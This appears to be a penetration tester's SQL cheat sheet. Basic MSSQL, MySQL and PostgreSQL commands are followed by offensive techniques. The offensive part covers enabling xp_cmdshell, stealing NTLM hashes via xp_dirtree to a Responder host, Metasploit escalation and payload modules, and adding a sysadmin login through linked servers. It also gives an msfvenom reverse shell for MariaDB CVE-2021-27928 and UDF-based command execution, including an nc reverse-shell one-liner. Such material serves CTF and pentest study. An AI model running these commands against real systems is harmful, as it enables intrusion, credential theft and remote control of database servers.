MSSQL / MYSQL / PSQL
SQL / MYSQL cheat sheet
00. Basic
## ------------------| Create Database
CREATE DATABASE <DB_NAME>;
## ------------------| Create Table
CREATE TABLE <TABLE_NAME> (
<VARIABLE> <DATA_TYPE>,
<VARIABLE> <DATA_TYPE>,
);
## ------------------| Create user and password
CREATE USER '<USER>'@'<IP>' IDENTIFIED BY '<PASSWORD>';
## ------------------| Show Database / Tables
SHOW DATABASES;
SHOW TABLES;
## ------------------| Select Database / Table
USE <DB_NAME>;
DESCRIBE <TABLE_NAME>;
## ------------------| Remove tables
DROP TABLE <TABLE_NAME>;
## ------------------| Alter queries
### Add new column
ALTER TABLE <TABLE_NAME> ADD <VARIABLE> <DATA_TYPE>;
### Rename a column
ALTER TABLE <TABLE_NAME> RENAME COLUMN <NEW_VARIABLE> TO <OLD_VARIABLE>;
### Change a column
ALTER TABLE <TABLE_NAME> MODIFY <OLD_VARIABLE> DATE;
### Drop, Delete a column
ALTER TABLE <TABLE_NAME> DROP <VARIABLE>;
## ------------------| Update queries
UPDATE <TABLE_NAME> SET column1=newvalue1, column2=newvalue2, ... WHERE <condition>;
## ------------------| Sorting queries
SELECT * FROM <TABLE_NAME> ORDER BY <VARIABLE> DESC, <VARIABLE> ASC;
## ------------------| Limit query
SELECT * FROM <TABLE_NAME> LIMIT <VALUE>,<VALUE>;
## ------------------| Filter or search for specific data,
SELECT * FROM <TABLE_NAME> WHERE <condition>;
## ------------------| Matching a certain pattern
SELECT * FROM <TABLE_NAME> WHERE <VARIABLE> LIKE '<REGEX>'; ## __ or %%
## ------------------| Insert data to table
INSERT INTO <TABLE_NAME> VALUES (<COL-01_VALUE>,<COL-02_VALUE>, ...);
INSERT INTO <TABLE_NAME>(<COL-01>, <COL-02>, ...) VALUES (<COL-01_VALUE>,<COL-02_VALUE>, ...);
## ------------------| View the table
SELECT * FROM <TABLE_NAME>;
SELECT <COL-01>, <COL-02> FROM <TABLE_NAME>;
## ------------------| Table Properties
### Uniquely identify propertie
PRIMARY KEY (<VARIABLE>)
### Automatically Increments
<VARIABLE> INT NOT NULL AUTO_INCREMENT,
### Always unique.
<VARIABLE> <DATA_TYPE> UNIQUE NOT NULL,
### Set the default value
<VARIABLE> <DATA_TYPE> DEFAULT NOW(),
## ------------------| Grannt Privileges
GRANT ALL ON <DB_NAME>.* TO '<USER>'@'<IP>';
FLUSH PRIVILEGES;
01. MSSQL
Basic
## ------------------| Login to the database
impacket-mssqlclient admin:'m$$ql_S@_P@ssW0rd!'@10.10.10.52
impacket-mssqlclient admin:'m$$ql_S@_P@ssW0rd!'@10.10.10.52 -windows-auth
## ------------------| Execute commands with impacket-mssqlclient
enable_xp_cmdshell
xp_cmdshell whoami
## ------------------| Execute commands with CrackMapExec
crackmapexec mssql <IP> -u <UserName> -p <Password> -x "whoami" # CMD command
crackmapexec mssql <IP> -u <UserName> -H <HASH> -X 'whoami' # PowerShell
## ------------------| Enable xp_cmdshell manually
SELECT IS_SRVROLEMEMBER ('sysadmin');
EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
xp_cmdshell "whoami"
## ------------------| Steel NTLM Hash
sudo responder -I tun0
EXEC xp_dirtree '\\10.10.14.38\h4rithd'
DECLARE @h varchar(200);SET @h='\\10.10.14.38\h4rithd'; EXEC master.dbo.xp_dirtree @h;
## Crack
hashcat -m 5600 hash.txt wordlist.txt
john hash.txt -w=wordlist.txt
## ------------------| Enable external scripts
EXECUTE sp_configure 'external scripts enabled', 1;
RECONFIGURE
EXEC sp_execute_external_script @language = N'Python', @script = N'print("Hello harith");';
EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("whoami");';
Enumerations
## ------------------| Nmap Scripts
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
## ------------------| Metasploit Modules
## Steal NTLM hash, before executing run Responder
use auxiliary/admin/mssql/mssql_ntlm_stealer
## Info gathering
use admin/mssql/mssql_enum
use admin/mssql/mssql_enum_domain_accounts
use admin/mssql/mssql_enum_sql_logins
use auxiliary/admin/mssql/mssql_findandsampledata
use auxiliary/scanner/mssql/mssql_hashdump
use auxiliary/scanner/mssql/mssql_schemadump
## Search for insteresting data
use auxiliary/admin/mssql/mssql_findandsampledata
use auxiliary/admin/mssql/mssql_idf
## Privesc
use exploit/windows/mssql/mssql_linkcrawler
## If the user has IMPERSONATION privilege, this will try to escalate
use admin/mssql/mssql_escalate_execute_as
## Escalate from db_owner to sysadmin
use admin/mssql/mssql_escalate_dbowner
## Execute commands
use admin/mssql/mssql_exec
## Uploads and execute a payload
use exploit/windows/mssql/mssql_payload
## Add new admin user from meterpreter session
use windows/manage/mssql_local_auth_bypass
Common Commands
## ------------------| Connet
sqlcmd -U <UserName> -P '<Password>' -Q "sp_databases"
sqlcmd -U <UserName> -P '<Password>' -Q 'USE <DATABASE>; select * from users;'
## ------------------| List all databases
SELECT name FROM master.dbo.sysdatabases;
select name from sysdatabases;
EXEC sp_databases;
## ------------------| List Tables
select table_name,table_schema from <DB_NAME>.INFORMATION_SCHEMA.TABLES;
SELECT name FROM <DBNAME>..sysobjects WHERE xtype = 'U';
## ------------------| List Column Names
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'table_name');
SELECT table_name, column_name FROM information_schema.columns;
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = '<TABLE_NAME>' ORDER BY ORDINAL_POSITION
EXEC sp_columns '<TABLE_NAME>'
## ------------------| Export data
EXEC xp_cmdshell 'bcp "SELECT * FROM sysfiles" queryout "C:\dump-data.txt" -T -c -t,'
## ------------------| Search text in stored procedure in SQL Server
SELECT name FROM sys.procedures WHERE Object_definition(object_id) LIKE '%flag%';
## ------------------| Other
select name,sysadmin from syslogins;
SELECT schema_name FROM information_schema.schemata;
## ------------------| Check links
select srvname, isremote from sysservers; <-- value 1 is remote 0 is linked
exec ('select current_user') at [linkd_name];
exec ('select name,sysadmin from syslogins') at [linkd_name];
exec ('EXEC (''EXEC sp_addlogin ''''h4rithd'''', ''''harith!1'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
exec ('EXEC (''EXEC sp_addsrvrolemember ''''h4rithd'''', ''''sysadmin'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\EXEC POO_CONFIG];
## ------------------| Enable Command Execution
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure reconfigure;
EXEC sp_configure 'xp_cmdshell', 1;
EXEC sp_configure reconfigure;
## ------------------| Command Execution
EXEC master.dbo.xp_cmdshell 'cmd';
EXEC xp_cmdshell 'cmd';
## ------------------| Enable Alternative Command Execution
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure reconfigure;
EXEC sp_configure 'OLE Automation Procedures', 1;
EXEC sp_configure reconfigure;
## ------------------| Alternative Command Execution
DECLARE @execmd INT;
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT;
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%system32cmd.exe /c';
## ------------------| RunAs
SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'password', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');
EXECUTE AS USER = 'FooUser';
## ------------------| Read file (MSSQL)
BULK INSERT dbo.temp FROM 'c:flag.txt' WITH ( ROWTERMINATOR='n' );
DECLARE @h varchar(200);SET @h='\\10.10.14.38\h4rithd'; EXEC master.dbo.xp_dirtree @h;
MDF File locations
## SQL Server 2019 --> MSSQL15.XXXXXX
## SQL Server 2017 --> MSSQL14.XXXXXX
## SQL Server 2016 --> MSSQL13.XXXXXX
## SQL Server 2014 --> MSSQL12.XXXXXX
## ------------------| For example : SQL Server 2019
C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\DATA\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\DATA\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Backup\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Backup\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\DATA\mastlog.ldf
C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\DATA\tempdb.mdf
C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\DATA\MSDBData.mdf
C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf
MDF Extracting
git clone https://github.com/xpn/Powershell-PostExploitation.git
cd Powershell-PostExploitation/Invoke-MDFHashes
## Edit following lines on Get-MDFHashes.ps1 file
[System.Reflection.Assembly]::UnsafeLoadFrom($PSScriptRoot + "\OrcaMDF.RawCore.dll") | Out-Null
[System.Reflection.Assembly]::UnsafeLoadFrom($PSScriptRoot + "\OrcaMDF.Framework.dll") | Out-NUll
pwsh
. .\Get-MDFHashes.ps1
Get-MDFHashes -mdf master.mdf
02. MYSQL
MySQL [MariaDB] Common
## ------------------| Remote Connect
mysql -u <USER> -h <IP> -P <PORT> -p
## ------------------| Config files
/etc/mysql/mariadb.conf.d/50-server.cnf
## ------------------| Backup
mysqldump -u <USER> -p drupal > drupal_backup.sql
## ------------------| Import
mysql -u <USER> -p drupal < drupal_backup.sql
## ------------------| Reset password
sudo service mysql stop
sudo mkdir /var/run/mysqld
sudo chown mysql: /var/run/mysqld
sudo mysqld_safe --skip-grant-tables --skip-networking &
mysql -u root
FLUSH PRIVILEGES;
UPDATE mysql.user SET authentication_string=PASSWORD('toor'), plugin='mysql_native_password' WHERE User='root' AND Host='localhost';
# ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';
FLUSH PRIVILEGES;
SELECT user,authentication_string,plugin,host FROM mysql.user;
EXIT;
sudo mysqladmin -S /var/run/mysqld/mysqld.sock shutdown
sudo service mysql start
03. PostgreSQL
## ------------------| Connect to database
psql -h 127.0.0.1 -U <USER_NAME> <DB_NAME>
### Using php
<?php
$conn = pg_connect("host=127.0.0.1 dbname=<DBName> user=<UserName> password=<PassWord>");
$result = pg_query($conn, "SELECT * FROM <DBName>");
$output = pg_fetch_all($result); print_r($output);
?>
## ------------------| List database information
\d
\dt
\dp <-- permisions
select * from <TABLE_NAME>
04. Common Exploits
MariaDB 10.2 (CVE-2021-27928)
## ------------------| Check version
SELECT VERSION();
## ------------------| Create the reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o exploit.so
### Copy the payload to the target machine
## ------------------| Execute the payload
mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/exploit.so";'
04.1 User-Defined Function
5.5.5-10.3.20-MariaDB
## ------------------| Enum
show variables like '%plugin%';
show variables like '%secure_file_priv%'; ## this should return null or empty
## ------------------| Setup
git clone https://github.com/mysqludf/lib_mysqludf_sys && cd lib_mysqludf_sys
sudo apt install -y default-libmysqlclient-dev
wget https://deb.sipwise.com/debian/pool/main/m/mariadb-10.3/libmariadb-dev_10.3.23-0+deb10u1_amd64.deb
sudo dpkg -i ./libmariadb-dev_10.3.23-0+deb10u1_amd64.de
rm lib_mysqludf_sys.so
gcc -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/ -I/usr/include/mariadb/server/private -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
xxd -p lib_mysqludf_sys.so | tr -d '\n' > lib_mysqludf_sys.so.hex
## ------------------| Execute
set @shell = 0x<SHLLCODE>
select @@plugin_dir;
select binary @shell into dumpfile '<plugin_dir>/udf_sys_exec.so';
drop function sys_exec;
create function sys_exec returns int soname 'udf_sys_exec.so';
select * from mysql.func where name='sys_exec';
select sys_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> 443 >/tmp/f');
Mysql
## ------------------| Enum
show variables like '%plugin%';
show variables like '%secure_file_priv%'; ## this should return null or empty
## ------------------| Setup
wget https://www.exploit-db.com/raw/1518 -O raptor_udf2.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
## ------------------| Execute
mysql -u root -p
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
select * from foo into dumpfile '<plugin_dir_path>/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('ping -c 2 <IP>');
Last updated